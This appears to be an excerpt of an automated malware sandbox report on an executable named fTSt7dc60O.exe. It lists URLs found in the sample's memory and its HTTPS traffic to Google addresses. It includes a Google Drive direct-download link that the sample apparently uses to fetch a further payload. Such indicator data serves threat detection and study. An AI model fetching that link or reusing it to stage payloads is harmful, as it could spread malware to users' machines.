      Source: fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download6E
      Source: fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadC
      Source: fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadFB
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563404234.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadW
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadcn
      Source: fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadg
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadgo
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadid
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadk
      Source: fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloado
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563404234.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadof
      Source: fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2173000440.00000000071E8000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2050032232.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284224248.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161674235.00000000071E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadt
      Source: fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894484625.00000000071E5000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloadt1
      Source: fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=downloady
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: fTSt7dc60O.exe, 00000002.00000003.2782832778.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894405292.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161570317.0000000007237000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2038964146.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2039004039.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2537573153.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1917297721.000000000723A000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2294964216.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2527520859.000000000722D000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.3142974272.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659181936.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2295073701.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284013765.0000000007235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: fTSt7dc60O.exe, 00000002.00000003.2039004039.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659363284.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928334150.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841391848.00000000071DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate
      Source: fTSt7dc60O.exe, 00000002.00000003.2782832778.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894405292.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161570317.0000000007237000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2038964146.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2537573153.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1917297721.000000000723A000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2294964216.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2527520859.000000000722D000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.3142974272.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659181936.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2295073701.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284013765.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.3016968574.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841256524.00000000071E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: fTSt7dc60O.exe, 00000002.00000003.2782832778.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1841603294.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2894405292.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2161570317.0000000007237000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2038964146.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2039004039.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1563473880.00000000071EB000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2537573153.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1917297721.000000000723A000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2294964216.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2527520859.000000000722D000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1928283893.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071E4000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2405539079.00000000071DA000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.1674532367.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.0000000007168000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.3142974272.0000000007235000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2659181936.0000000007234000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2295073701.000000000722C000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2906151522.00000000071E6000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2284013765.0000000007235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: fTSt7dc60O.exe, 00000002.00000003.2906189082.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000003.2771780633.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, fTSt7dc60O.exe, 00000002.00000002.3160639426.00000000071CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com:
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comJ
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comJJ
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: fTSt7dc60O.exe, 00000002.00000003.1795807574.00000000071E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49842 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.10:49853 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49917 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49991 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49993 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.10:49998 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.10:50001 version: TLS 1.2
